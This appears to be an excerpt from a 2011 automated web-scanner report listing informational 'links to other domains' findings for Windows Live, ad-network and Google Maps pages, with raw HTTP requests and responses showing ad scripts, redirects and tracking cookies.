<li><a id="uxp_ftr_link_developers" target="_top" href="http://go.microsoft.com/fwlink/?LinkId=214291">Developers</a>
...[SNIP]...
<span class="is_c"><img class="is_img" onload="$Do.when('$IS.Init',0,this);" style="background-image:url(http://secure.wlxrs.com/$live.controls.images/h/s7.png);background-position:-94px -8px;width:16px;height:16px;" src="http://secure.wlxrs.com/$live.controls.images/is/invis.gif" alt=""/></span>
...[SNIP]...
<span class="is_c"><img class="is_img" onload="$Do.when('$IS.Init',0,this);" style="background-image:url(http://secure.wlxrs.com/$live.controls.images/h/s7.png);background-position:-62px -8px;width:16px;height:16px;" src="http://secure.wlxrs.com/$live.controls.images/is/invis.gif" alt=""/></span>
...[SNIP]...
<span class="is_c"><img class="is_img" onload="$Do.when('$IS.Init',0,this);" style="background-image:url(http://secure.wlxrs.com/$live.controls.images/h/s7.png);background-position:-78px -8px;width:16px;height:16px;" src="http://secure.wlxrs.com/$live.controls.images/is/invis.gif" alt=""/></span>
...[SNIP]...
<span class="is_c"><img class="is_img" onload="$Do.when('$IS.Init',0,this);" style="background-image:url(http://secure.wlxrs.com/$live.controls.images/h/s7.png);background-position:-46px -8px;width:16px;height:16px;" src="http://secure.wlxrs.com/$live.controls.images/is/invis.gif" alt=""/></span>
...[SNIP]...
</script><script type="text/javascript" src="http://js.wlxrs.com/_D/IW9RMFusiP7aP7lsSm5H9w/jquery-min.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://js.wlxrs.com/IW9RMFusiP7aP7lsSm5H9w/wlive.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://js.wlxrs.com/MVZ9IMxspbQFL8KYd3mZeg/SearchBox.js"></script><script type="text/javascript" src="http://msc.wlxrs.com/sDSzhnAI0HbE94-7UyUFRA/Popover.js"></script><script type="text/javascript" src="http://msc.wlxrs.com/Zb!TZqMB7AnDRG!PwdG5PQ/js/InvitePopover.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://js.wlxrs.com/4zz1a0sDfk8F0baNdznX2A/Search.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://js.wlxrs.com/MDkCGfAXrMQjb2SY98x7WQ/comscore/beacon.js"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000001&c3=&c4=wlhome&c5=&c6=&c15=&cv=1.3&cj=1"
style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...

18.82. http://home.live.com/search/hip previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.live.com
Path:	/search/hip

Issue detail

The page was loaded from a URL containing a query string:

http://home.live.com/search/hip?query=h02332

The response contains the following links to other domains:

http://b.scorecardresearch.com/b?c1=2&c2=3000001&c3=&c4=wlhome&c5=&c6=&c15=&cv=1.3&cj=1
http://css.wlxrs.com/cAdBg0BF1RU6ts8Co7IhiuCQOC-gu2JSiDTy2H8vEN5PzclNxvppS7NQcdDGWxe-0D3X2-QuAol1pMTeH3a1CQ/Base/16.0.1723/NYKpPzcj59cwuxbasecss.css?ZfDHJ0dwkwrfIMoja3-R7w
http://g.msn.com/0TO_/enus
http://g.msn.com/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=214291
http://go.microsoft.com/fwlink/?LinkId=74170
http://img.wlxrs.com/oHrsBlc8W6xTfnKtAe79xg/WindowsLive.png
http://js.wlxrs.com/IW9RMFusiP7aP7lsSm5H9w/wlive.js
http://js.wlxrs.com/MDkCGfAXrMQjb2SY98x7WQ/comscore/beacon.js
http://js.wlxrs.com/_D/IW9RMFusiP7aP7lsSm5H9w/jquery-min.js
http://msc.wlxrs.com/MoMjyHwQMDDxLYHc4jzTKA/js/hipV3.js
http://secure.wlxrs.com/$live.controls.images/common/progress_loading.gif
http://secure.wlxrs.com/$live.controls.images/m/flag.ico

Request

Response

18.83. http://ib.adnxs.com/if previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/if

Issue detail

The page was loaded from a URL containing a query string:

http://ib.adnxs.com/if?enc=UrgehetR4D9SuB6F61HgPwAAAKCZmQVAmpmZmZmZBUCamZmZmZkFQBsceZa4RtQh_________398aShOAAAAAPknAAC1AAAAbAEAAAIAAAAAPgcA0WMAAAEAAABVU0QAVVNEANgCWgC4Ck8AiQQBAgUCAQQAAAAAYyYClQAAAAA.&pubclick=http://adclick.g.doubleclick.net/aclk?sa%3Dl%26ai%3DBi87SfGkoTpWTLOX1lQev7PBwwMbU9wH4uJ-PG8Cv6u9EABABGAEgADgBUIDH4cQEYMnW8obIo_waggEXY2EtcHViLTczMDY5MTk3MjM4Mjc3NjWyARRnYW1lcy5teXllYXJib29rLmNvbboBCTcyOHg5MF9hc8gBCdoBHGh0dHA6Ly9nYW1lcy5teXllYXJib29rLmNvbS-YAv4DwAIEyAKoqKQZ4AIA6gIXTVlCXzcyOHg5MF9HYW1lc19Ib21lXzKoAwHoAwjoAyfoA54H9QMAAIBM4AQBgAa4raSoqt7Y4JcB%26num%3D1%26sig%3DAOD64_0HV9CyXXRXmldNeY-MsDj6zKvo0g%26client%3Dca-pub-7306919723827765%26adurl%3D&tt_code=vert-8&udj=uf%28%27a%27%2C+16736%2C+1311271292%29%3Buf%28%27c%27%2C+98655%2C+1311271292%29%3Buf%28%27r%27%2C+474624%2C+1311271292%29%3Bppv%2814961%2C+%272437651056926727195%27%2C+1311271292%2C+1312480892%2C+98655%2C+25553%29%3B&cnd=!2BuvpQjfggYQgPwcGAAg0ccBMAA4uBVAAEjsAlAAWABgpwZoAHAAeACAAQSIAWaQAQGYAQGgAQGoAQOwAQC5AQAAAKCZmQVAwQEAAACgmZkFQMkBMzMzMzMz9z_ZAQAAAAAAAPA_4AG_Gw..&ccd=!6QTzJwjfggYQgPwcGNHHASAA&referrer=http://games.myyearbook.com/

The response contains the following links to other domains:

http://b3.mookie1.com/2/ZapTraderB3/Panera/2011Q2/CS_DAL/728/11311271292@x90
http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=bsr&FlightID=2711514&Page=&PluID=0&Pos=3391
http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2711514&PluID=0&w=728&h=90&ord=1311271292&ucm=true&ncu=$$http://ib.adnxs.com/click?UrgehetR4D9SuB6F61HgPwAAAKCZmQVAmpmZmZmZBUCamZmZmZkFQBsceZa4RtQh_________398aShOAAAAAPknAAC1AAAAbAEAAAIAAAAAPgcA0WMAAAEAAABVU0QAVVNEANgCWgC4Ck8AiQQBAQUCAQQAAAAAYibxlAAAAAA./cnd=!6QTzJwjfggYQgPwcGNHHASAA/referrer=http%3A%2F%2Fgames.myyearbook.com%2F/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBi87SfGkoTpWTLOX1lQev7PBwwMbU9wH4uJ-PG8Cv6u9EABABGAEgADgBUIDH4cQEYMnW8obIo_waggEXY2EtcHViLTczMDY5MTk3MjM4Mjc3NjWyARRnYW1lcy5teXllYXJib29rLmNvbboBCTcyOHg5MF9hc8gBCdoBHGh0dHA6Ly9nYW1lcy5teXllYXJib29rLmNvbS-YAv4DwAIEyAKoqKQZ4AIA6gIXTVlCXzcyOHg5MF9HYW1lc19Ib21lXzKoAwHoAwjoAyfoA54H9QMAAIBM4AQBgAa4raSoqt7Y4JcB%26num%3D1%26sig%3DAOD64_0HV9CyXXRXmldNeY-MsDj6zKvo0g%26client%3Dca-pub-7306919723827765%26adurl%3D$$&apui=1
http://c.betrad.com/surly.js?;ad_w=728;ad_h=90;coid=259;nid=1886;ecaid=ZapTraderB3/Panera/2011Q2/CS_DAL/728

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 22-Jul-2011 18:01:46 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6516234360771219075; path=/; expires=Wed, 19-Oct-2011 18:01:46 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Set-Cookie: anj=Kfu=8fG4S]cvjr/?0P(*AuB-u**g1:XIFC`EhzW%<rg(XV)`CZ8D]ccqzB-6O8z_!o8J2McQT/AO0qb`?WerkXHFIP'qdxsQ<=Yls'k00(-!eqSrIt<; path=/; expires=Wed, 19-Oct-2011 18:01:46 GMT; domain=.adnxs.com; HttpOnly
Date: Thu, 21 Jul 2011 18:01:46 GMT
Content-Length: 2773

<script>var gEbBAd = new Object();gEbBAd.AClickUrl = "http://t.mookie1.com/t/v1/clk?migAgencyId=66&migSource=mmind&migTrackDataExt=[%tp_AdID%];[%tp_PlacementID%]&migRandom=[ebRandom]&migTrackFmtExt=ad
...[SNIP]...
</script><script src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2711514&PluID=0&w=728&h=90&ord=1311271292&ucm=true&ncu=$$http://ib.adnxs.com/click?UrgehetR4D9SuB6F61HgPwAAAKCZmQVAmpmZmZmZBUCamZmZmZkFQBsceZa4RtQh_________398aShOAAAAAPknAAC1AAAAbAEAAAIAAAAAPgcA0WMAAAEAAABVU0QAVVNEANgCWgC4Ck8AiQQBAQUCAQQAAAAAYibxlAAAAAA./cnd=!6QTzJwjfggYQgPwcGNHHASAA/referrer=http%3A%2F%2Fgames.myyearbook.com%2F/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBi87SfGkoTpWTLOX1lQev7PBwwMbU9wH4uJ-PG8Cv6u9EABABGAEgADgBUIDH4cQEYMnW8obIo_waggEXY2EtcHViLTczMDY5MTk3MjM4Mjc3NjWyARRnYW1lcy5teXllYXJib29rLmNvbboBCTcyOHg5MF9hc8gBCdoBHGh0dHA6Ly9nYW1lcy5teXllYXJib29rLmNvbS-YAv4DwAIEyAKoqKQZ4AIA6gIXTVlCXzcyOHg5MF9HYW1lc19Ib21lXzKoAwHoAwjoAyfoA54H9QMAAIBM4AQBgAa4raSoqt7Y4JcB%26num%3D1%26sig%3DAOD64_0HV9CyXXRXmldNeY-MsDj6zKvo0g%26client%3Dca-pub-7306919723827765%26adurl%3D$$&apui=1"></script>
...[SNIP]...
mldNeY-MsDj6zKvo0g%26client%3Dca-pub-7306919723827765%26adurl%3Dhttp%3A//bs.serving-sys.com/BurstingPipe/adServer.bs%3Fcn%3Dbrd%26FlightID%3D2711514%26Page%3D%26PluID%3D0%26Pos%3D3391" target="_blank"><img src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=bsr&FlightID=2711514&Page=&PluID=0&Pos=3391" border=0 width=728 height=90></a></noscript><IFRAME SRC='http://b3.mookie1.com/2/ZapTraderB3/Panera/2011Q2/CS_DAL/728/11311271292@x90' WIDTH=0 HEIGHT=0 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'></IFRAME><script type="text/javascript" src="http://c.betrad.com/surly.js?;ad_w=728;ad_h=90;coid=259;nid=1886;ecaid=ZapTraderB3/Panera/2011Q2/CS_DAL/728"></script>

18.84. http://ib.adnxs.com/ptj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The page was loaded from a URL containing a query string:

http://ib.adnxs.com/ptj?member=311&inv_code=cm.yearbook&size=160x600&imp_id=cm-10109720508_1311273739,11fda490648f83c&referrer=http%3A%2F%2Fgames.myyearbook.com%2Flanding%2Fpool&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.yearbook%2Fford_ron_071911%3Bnet%3Dcm%3Bu%3D%2Ccm-10109720508_1311273739%2C11fda490648f83c%2Cgames%2Cax.{PRICEBUCKET}-cm.games_h-bz.25%3B%3Bcmw%3Dowl%3Bsz%3D160x600%3Bnet%3Dcm%3Bord1%3D141338%3Bcontx%3Dgames%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.games_h%3Bbtg%3Dbz.25%3Bord%3D467262788%3F

The response contains the following link to another domain:

http://view.atdmt.com/ADO/view/278612728/direct;wi.1;hi.1/01

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 22-Jul-2011 18:42:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6516234360771219075; path=/; expires=Wed, 19-Oct-2011 18:42:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChEIz34QChgDIAMoAzCO5qHxBBCO5qHxBBgC; path=/; expires=Wed, 19-Oct-2011 18:42:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb969899=5_[r^XI()v^9#a*>bPMv<tqGY?enc=AAAAAAAA8D_NzMzMzMzsPwAAAMDMzARAzczMzMzM7D8AAAAAAADwP9KF7IzQcFRhg472aqBQbloOcyhOAAAAAAw8AwA3AQAA3QEAAAIAAABNfgYA510AAAEAAABVU0QAVVNEAKAAWAIlDQAAXQwBAgUCAQUAAAAAvSHLUAAAAAA.&tt_code=cm.yearbook&udj=uf%28%27a%27%2C+1267%2C+1311273742%29%3Buf%28%27c%27%2C+39654%2C+1311273742%29%3Buf%28%27r%27%2C+425549%2C+1311273742%29%3Bppv%281279%2C+%277013354560742524370%27%2C+1311273742%2C+1311878542%2C+39654%2C+24039%29%3Bppv%285150%2C+%277013354560742524370%27%2C+1311273742%2C+1311360142%2C+39654%2C+24039%29%3B&cnd=!wRzA7QjmtQIQzfwZGAAg57sBMAE4pRpAAEjdA1CM-AxYAGBLaABwAHgAgAEAiAEAkAEBmAEBoAECqAEDsAEAuQEAAAAAAADwP8EBAAAAAAAA8D_JAZqZmZmZmfE_2QEAAAAAAADwP-ABAA..&ccd=!cwVkLQjmtQIQzfwZGOe7ASAA; path=/; expires=Fri, 22-Jul-2011 18:42:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG6kGcvjr/?0P(*AuB-u**g1:XIDv6EhzW%<rg(XV)`CZ8D]cc=P#sv.YU8([jc)h`pkhkA<7Rq^*hF#*/D]^!w7Nfw7w826zPtJ>b4b!'q=o9Pq(vZVMDwujiuiG!0[R/9RD+i; path=/; expires=Wed, 19-Oct-2011 18:42:22 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 21 Jul 2011 18:42:22 GMT
Content-Length: 424

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.yearbook/ford_ron_071911;net=cm;u=,cm-10109720508_1311273739,11fda490648f83c,games,ax.80-cm.games_h-bz.25;;cmw=ow
...[SNIP]...
</scr'+'ipt>');document.write('<img src="http://view.atdmt.com/ADO/view/278612728/direct;wi.1;hi.1/01" width="1" height="1"/>');

18.85. http://ib.adnxs.com/ptj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The page was loaded from a URL containing a query string:

http://ib.adnxs.com/ptj?member=311&inv_code=cm.yearbook&size=300x250&imp_id=cm-10306552516_1311271251,11fda490648f83c&referrer=http%3A%2F%2Fgames.myyearbook.com%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.yearbook%2Fford_ron_071911%3Bnet%3Dcm%3Bu%3D%2Ccm-10306552516_1311271251%2C11fda490648f83c%2Cgames%2Cax.{PRICEBUCKET}-bz.25%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Bord1%3D218732%3Bcontx%3Dgames%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dbz.25%3Bord%3D1520731557%3F

The response contains the following link to another domain:

http://apnxscm.ac3.msn.com:81/CACMSH.ashx?&t=1

Request

GET /ptj?member=311&inv_code=cm.yearbook&size=300x250&imp_id=cm-10306552516_1311271251,11fda490648f83c&referrer=http%3A%2F%2Fgames.myyearbook.com%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.yearbook%2Fford_ron_071911%3Bnet%3Dcm%3Bu%3D%2Ccm-10306552516_1311271251%2C11fda490648f83c%2Cgames%2Cax.{PRICEBUCKET}-bz.25%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Bord1%3D218732%3Bcontx%3Dgames%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dbz.25%3Bord%3D1520731557%3F HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: sess=1; uuid2=6516234360771219075; anj=Kfu=8fG5+^Cxrx)0s]#%2L_'x%SEV/hnK]18Ep.I>u3?!7G'6v$WPt[fR4#aoQ.`e#:wJBP@1>+^X$?SUr+(fV+'zvLnT#=)OqIw

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 22-Jul-2011 18:00:53 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6516234360771219075; path=/; expires=Wed, 19-Oct-2011 18:00:53 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChEIz34QChgCIAIoAjDV0qHxBBDV0qHxBBgB; path=/; expires=Wed, 19-Oct-2011 18:00:53 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb390451=5_[r^208WM^9#a*>bPMvSdL7A?enc=AAAAAAAA8D_NzMzMzMzsPwAAAEAzMwNAzczMzMzM7D8AAAAAAADwP9QC9eWCJ9pXg472aqBQblpVaShOAAAAAAw8AwA3AQAA3QEAAAIAAABOfgYA510AAAEAAABVU0QAVVNEACwB-gAlDQAAwREBAgUCAQUAAAAApCDOoQAAAAA.&tt_code=cm.yearbook&udj=uf%28%27a%27%2C+1267%2C+1311271253%29%3Buf%28%27c%27%2C+39654%2C+1311271253%29%3Buf%28%27r%27%2C+425550%2C+1311271253%29%3Bppv%281279%2C+%276330415669379924692%27%2C+1311271253%2C+1311876053%2C+39654%2C+24039%29%3Bppv%285150%2C+%276330415669379924692%27%2C+1311271253%2C+1311357653%2C+39654%2C+24039%29%3B&cnd=!whwh7gjmtQIQzvwZGAAg57sBMAE4pRpAAEjdA1CM-AxYAGBLaABwAHgAgAEAiAEAkAEBmAEBoAECqAEDsAEAuQEAAAAAAADwP8EBAAAAAAAA8D_JAZqZmZmZmfE_2QEAAAAAAADwP-ABAA..&ccd=!dAVtLQjmtQIQzvwZGOe7ASAA; path=/; expires=Fri, 22-Jul-2011 18:00:53 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG2<rcvjr/?0P(*AuB-u**g1:XIB_LEhzW%<rg(XV)`CZ8D]ccqzB-6O8z_!o8J2McQT/AO0qb`?Werk8ML`j]Wy`3:#7I9PoKK9quf^[F$tC40Ivv=-wxAh-.NxO; path=/; expires=Wed, 19-Oct-2011 18:00:53 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 21 Jul 2011 18:00:53 GMT
Content-Length: 385

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.yearbook/ford_ron_071911;net=cm;u=,cm-10306552516_1311271251,11fda490648f83c,games,ax.80-bz.25;;cmw=owl;sz=300x25
...[SNIP]...
</scr'+'ipt>');document.write('<img src="http://apnxscm.ac3.msn.com:81/CACMSH.ashx?&t=1" width="1" height="1"/>');

18.86. http://img.mediaplex.com/content/0/16024/128483/lifescript-470x250.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/16024/128483/lifescript-470x250.js

Issue detail

The page was loaded from a URL containing a query string:

http://img.mediaplex.com/content/0/16024/128483/lifescript-470x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16024-128483-16880-2%3Fmpt%3D80352151311276189929&mpt=80352151311276189929&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b4b/3/0/%2a/q%3B243260174%3B0-0%3B0%3B31210306%3B6510-470/250%3B42925500/42943287/1%3B%3B%7Eokv%3D%3Bpath%3Dhealth/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd%3Bcontentid%3D7f47b713%3Babr%3D%21webtvs%3Btax%3Dadhd%3Btax%3Dadhd_adult%3Btax%3Dadult_adhd%3Bcamp%3Dadhd%3Bcamp%3Dadhd_adult%3Bpos%3D1%3Btile%3D16%3B%7Esscs%3D%3f

The response contains the following link to another domain:

http://gadgets.justanswer.com/ja/assets/DropdownButton.png

Request

GET /content/0/16024/128483/lifescript-470x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16024-128483-16880-2%3Fmpt%3D80352151311276189929&mpt=80352151311276189929&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b4b/3/0/%2a/q%3B243260174%3B0-0%3B0%3B31210306%3B6510-470/250%3B42925500/42943287/1%3B%3B%7Eokv%3D%3Bpath%3Dhealth/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd%3Bcontentid%3D7f47b713%3Babr%3D%21webtvs%3Btax%3Dadhd%3Btax%3Dadhd_adult%3Btax%3Dadult_adhd%3Bcamp%3Dadhd%3Bcamp%3Dadhd_adult%3Bpos%3D1%3Btile%3D16%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;tile=16;sz=470x250;ord=101352252258050
Cookie: svid=396408271523; __utmz=183366586.1305458947.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.647930298.1305458947.1305458947.1305458947.1; mojo3=16024:16880

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:23:07 GMT
Server: Apache
Last-Modified: Thu, 30 Jun 2011 17:46:51 GMT
ETag: "4a9bc3-461e-4a6f17c6278c0"
Accept-Ranges: bytes
Content-Length: 18600
Content-Type: application/x-javascript

document.write( "<style>" );
document.write( ".selectOptional {display:none;}" );
document.write( ".headline_blockAD_____78296 {position:absolute;left:0px;top:10px;width:470px;height:30px;font-famil
...[SNIP]...
<div id="selection_list_btnAD_____78296"');
ar.push('><img align="right"');
ar.push(' src="http://gadgets.justanswer.com/ja/assets/DropdownButton.png" /></div>
...[SNIP]...

18.87. http://maps.google.com/maps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://maps.google.com
Path:	/maps

Issue detail

The page was loaded from a URL containing a query string:

http://maps.google.com/maps?f=q&source=s_q&hl=en&geocode=&q=77+Stillman+Street,+San+Francisco,+CA&aq=0&sll=37.766207,-122.425258&sspn=0.017014,0.014763&ie=UTF8&hq=&hnear=77+Stillman+St,+San+Francisco,+California+94107&ll=37.78218,-122.395849&spn=0.013567,0.017252&z=14&iwloc=A&output=embed

The response contains the following links to other domains:

http://maps.gstatic.com/favicon.ico
http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png
http://maps.gstatic.com/mapfiles/poweredby.png
http://maps.gstatic.com/mapfiles/smc.png
http://maps.gstatic.com/mapfiles/transparent.png

Request

GET /maps?f=q&source=s_q&hl=en&geocode=&q=77+Stillman+Street,+San+Francisco,+CA&aq=0&sll=37.766207,-122.425258&sspn=0.017014,0.014763&ie=UTF8&hq=&hnear=77+Stillman+St,+San+Francisco,+California+94107&ll=37.78218,-122.395849&spn=0.013567,0.017252&z=14&iwloc=A&output=embed HTTP/1.1
Host: maps.google.com
Proxy-Connection: keep-alive
Referer: http://corp.klout.com/contact
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=49=W8r0AKxd5wk5CX1jyfDbNGqu0gNP9tvrFwquFIFVcdigP0YfOxWLbqIT-uh0HQif4kRtxM0Zmnl6hxXO7elxBhi5M5Shuv0bLm6MSaba7TZWWydFwvwYYpn2fEzjfe3s

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Date: Sat, 23 Jul 2011 14:53:18 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: mfe
Content-Length: 159619
X-XSS-Protection: 1; mode=block

<!DOCTYPE html><html class="no-maps-mini" xmlns:v="urn:schemas-microsoft-com:vml"> <head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta content="Find local businesses, view maps and get driving directions in Google Maps" name="description"/> <link rel="shortcut icon" href="//maps.gstatic.com/favicon.ico"/> <noscript>
...[SNIP]...
<a class="kd-button print-button left small" title="Print" jsaction="print.show" href="javascript:void(0);" id="print"> <img class="print" src="//maps.gstatic.com/mapfiles/transparent.png"/> </a> <a class="kd-button email-button mid small" title="Send" jsaction="stx.show" href="javascript:void(0);" id="showsendtox"> <img class="send" src="//maps.gstatic.com/mapfiles/transparent.png"/> </a> <a class="kd-button permalink-button right small" title="Link" jsaction="link.show" href="javascript:void(0);" id="link"> <img class="link" src="//maps.gstatic.com/mapfiles/transparent.png"/> </a>
...[SNIP]...
<button class="kd-button kd-button-submit" title="Search Maps" type="submit" id="q-sub" name="btnG" tabindex="2"> <img class="search-white" src="//maps.gstatic.com/mapfiles/transparent.png"/> </button>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/smc.png"/> <div class="smcpanup" id="pan_up_inline" jsaction="smc.selectPanUp">
...[SNIP]...
</div> <img class="hide-msie-6 logo" src="http://maps.gstatic.com/mapfiles/poweredby.png"/> </a>
...[SNIP]...
<a id="d_close" href="javascript:void(0)" jsaction="llm.close" jstrack="1"> <img class="close" src="//maps.gstatic.com/mapfiles/transparent.png"/> </a>
...[SNIP]...
sName: 'kd-button' + ($count > 1 ? lt($index, 1) ? ' left' : gt($index, $count - 2) ? ' right' : ' mid' : '');" class="kd-button" href="javascript:void(0)" tabindex="3" jsaction="tm.click"> <img jsattrs="className: 'dir-tm-' + $this" class="dir-tm-d" src="//maps.gstatic.com/mapfiles/transparent.png"/> </a>
...[SNIP]...
<a class="kd-button" href="javascript:void(0)"> <img class="dir-reverse" src="//maps.gstatic.com/mapfiles/transparent.png"/> </a>
...[SNIP]...
<div class="icon " log="" jsaction="app.openInfoWindow" jsprops="markerid:'A'" jstrack="XuAqTsfjEJGEzgSx08GaBA" ved=0CAkQ_gswAA id="marker_A_1"><img alt="A" src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="mp iconA"/></div>
...[SNIP]...

18.88. http://media.fastclick.net/w/get.media previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.fastclick.net
Path:	/w/get.media

Issue detail

The page was loaded from a URL containing a query string:

http://media.fastclick.net/w/get.media?sid=38735&m=1&tp=5&d=j&t=n

The response contains the following link to another domain:

http://rd.apmebf.com/w/get.media?sid=38735&m=1&tp=5&d=j&t=n&host=media.fastclick.net

Request

GET /w/get.media?sid=38735&m=1&tp=5&d=j&t=n HTTP/1.1
Host: media.fastclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/landing/pool
Cookie: pluto2=559266702931; lyc=AwAAAAThKChOACAAAclYIASgAAWQUAAAfingCRcBfUugICAA4AUvAQAA; pluto=559266702931

Response

HTTP/1.1 302 Found
Date: Thu, 21 Jul 2011 18:43:09 GMT
Location: http://rd.apmebf.com/w/get.media?sid=38735&m=1&tp=5&d=j&t=n&host=media.fastclick.net
P3P: CP="NOI DSP DEVo TAIo COR PSA OUR IND NAV"
Content-Length: 288
